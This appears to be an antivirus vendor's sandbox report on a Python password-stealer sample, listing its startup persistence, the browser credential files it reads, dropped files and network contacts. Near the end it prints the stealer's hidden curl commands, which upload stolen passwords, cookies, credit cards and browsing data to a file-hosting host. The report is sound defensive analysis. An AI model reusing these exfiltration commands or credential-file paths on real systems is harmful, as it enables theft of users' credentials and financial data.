Python.Stealer.1447

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe

Malicious functions

Reads files which store third party applications passwords

%APPDATA%\opera software\opera stable\login data
%LOCALAPPDATA%\google\chrome\user data\default\web data
%LOCALAPPDATA%\google\chrome\user data\default\login data

Modifies file system

Creates the following files

%TEMP%\_mei49882\crypto\cipher\_arc4.pyd
%TEMP%\_mei49882\api-ms-win-crt-time-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-string-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-stdio-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-runtime-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-process-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-math-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-locale-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-heap-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-filesystem-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-environment-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-convert-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-crt-conio-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-util-l1-1-0.dll
%TEMP%\_mei49882\base_library.zip
%TEMP%\_mei49882\api-ms-win-crt-utility-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-synch-l1-2-0.dll
%TEMP%\_mei49882\api-ms-win-core-synch-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-string-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-rtlsupport-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-profile-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-processthreads-l1-1-1.dll
%TEMP%\_mei49882\api-ms-win-core-processthreads-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-processenvironment-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-namedpipe-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-memory-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-localization-l1-2-0.dll
%TEMP%\_mei49882\api-ms-win-core-libraryloader-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-interlocked-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-timezone-l1-1-0.dll
%TEMP%\_mei49882\crypto\hash\_poly1305.pyd
%TEMP%\_mei49882\certifi\cacert.pem
%LOCALAPPDATA%\tempcrgzqkfbes.db
%LOCALAPPDATA%\tempcrzwbrnipn.db
%LOCALAPPDATA%\tempcrqlwmjxtb.db
%LOCALAPPDATA%\tempcrxryuwlsg.db
%LOCALAPPDATA%\tempcrfwdclcvr.db
%LOCALAPPDATA%\tempcrduuwtmvg.db
%LOCALAPPDATA%\tempcrfzqlqoce.db
%TEMP%\_mei49882\win32\win32api.pyd
%TEMP%\_mei49882\unicodedata.pyd
%TEMP%\_mei49882\ucrtbase.dll
%TEMP%\_mei49882\sqlite3.dll
%TEMP%\_mei49882\select.pyd
%TEMP%\_mei49882\pywin32_system32\pywintypes312.dll
%TEMP%\_mei49882\python312.dll
%TEMP%\_mei49882\python3.dll
%TEMP%\_mei49882\pyexpat.pyd
%TEMP%\_mei49882\libssl-3.dll
%TEMP%\_mei49882\libffi-8.dll
%TEMP%\_mei49882\libcrypto-3.dll
%TEMP%\_mei49882\cryptography\hazmat\bindings\_rust.pyd
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\top_level.txt
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\wheel
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\record
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\metadata
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\license.bsd
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\license.apache
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\license
%TEMP%\_mei49882\cryptography-42.0.5.dist-info\installer
%TEMP%\_mei49882\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
%TEMP%\_mei49882\api-ms-win-core-heap-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-sysinfo-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-handle-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-file-l2-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-file-l1-2-0.dll
%TEMP%\_mei49882\crypto\cipher\_raw_eksblowfish.pyd
%TEMP%\_mei49882\crypto\hash\_sha512.pyd
%TEMP%\_mei49882\crypto\hash\_sha384.pyd
%TEMP%\_mei49882\crypto\hash\_sha256.pyd
%TEMP%\_mei49882\crypto\hash\_sha224.pyd
%TEMP%\_mei49882\crypto\hash\_sha1.pyd
%TEMP%\_mei49882\crypto\hash\_ripemd160.pyd
%TEMP%\_mei49882\crypto\hash\_md5.pyd
%TEMP%\_mei49882\crypto\hash\_md4.pyd
%TEMP%\_mei49882\crypto\hash\_md2.pyd
%TEMP%\_mei49882\crypto\hash\_blake2s.pyd
%TEMP%\_mei49882\crypto\hash\_blake2b.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_ofb.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_ocb.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_ecb.pyd
%TEMP%\_mei49882\crypto\hash\_ghash_portable.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_des3.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_des.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_ctr.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_cfb.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_cbc.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_cast.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_blowfish.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_arc2.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_aesni.pyd
%TEMP%\_mei49882\crypto\cipher\_raw_aes.pyd
%TEMP%\_mei49882\crypto\cipher\_pkcs1_decode.pyd
%TEMP%\_mei49882\crypto\cipher\_chacha20.pyd
%TEMP%\_mei49882\crypto\cipher\_salsa20.pyd
%TEMP%\crhistory.txt
%TEMP%\_mei49882\charset_normalizer\md.cp312-win_amd64.pyd
%TEMP%\_mei49882\crypto\hash\_keccak.pyd
%TEMP%\_mei49882\crypto\protocol\_scrypt.pyd
%TEMP%\_mei49882\crypto\hash\_ghash_clmul.pyd
%TEMP%\_mei49882\api-ms-win-core-file-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-errorhandling-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-debug-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-datetime-l1-1-0.dll
%TEMP%\_mei49882\api-ms-win-core-console-l1-1-0.dll
%TEMP%\_mei49882\_wmi.pyd
%TEMP%\_mei49882\_uuid.pyd
%TEMP%\_mei49882\_ssl.pyd
%TEMP%\_mei49882\_sqlite3.pyd
%TEMP%\_mei49882\_socket.pyd
%TEMP%\_mei49882\_queue.pyd
%TEMP%\_mei49882\_overlapped.pyd
%TEMP%\_mei49882\_multiprocessing.pyd
%TEMP%\_mei49882\_lzma.pyd
%TEMP%\_mei49882\_hashlib.pyd
%TEMP%\_mei49882\_decimal.pyd
%TEMP%\_mei49882\_ctypes.pyd
%TEMP%\_mei49882\_cffi_backend.cp312-win_amd64.pyd
%TEMP%\_mei49882\_bz2.pyd
%TEMP%\_mei49882\_asyncio.pyd
%TEMP%\_mei49882\vcruntime140_1.dll
%TEMP%\_mei49882\vcruntime140.dll
%TEMP%\_mei49882\crypto\util\_strxor.pyd
%TEMP%\_mei49882\crypto\util\_cpuid_c.pyd
%TEMP%\_mei49882\crypto\publickey\_x25519.pyd
%TEMP%\_mei49882\crypto\publickey\_ed448.pyd
%TEMP%\_mei49882\crypto\publickey\_ed25519.pyd
%TEMP%\_mei49882\crypto\publickey\_ec_ws.pyd
%TEMP%\_mei49882\crypto\math\_modexp.pyd
%LOCALAPPDATA%\tempcrmvcpzqgk.db

Network activity

Connects to

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'st####.gofile.io':443
'di##ord.com':443
'x1.#.lencr.org':80
'r3.#.lencr.org':80

TCP

HTTP GET requests

http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a9##############
http://x1.#.lencr.org/
http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgR%2BK3BWYQGKFivzodqw8AYNkw%3D%3D

Other

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'st####.gofile.io':443
'di##ord.com':443

UDP

DNS ASK ap#.#pify.org
DNS ASK ap#.#ofile.io
DNS ASK ge####ation-db.com
DNS ASK st####.gofile.io
DNS ASK di##ord.com
DNS ASK x1.#.lencr.org
DNS ASK r3.#.lencr.org

Miscellaneous

Searches for the following windows

ClassName: 'OleMainThreadWndClass' WindowName: ''

Creates and executes the following

'<SYSTEM32>\cmd.exe' /c "tasklist"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile"' (with hidden window)

Restarts the analyzed sample

Executes the following

'<SYSTEM32>\cmd.exe' /c "tasklist"
'<SYSTEM32>\tasklist.exe'
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней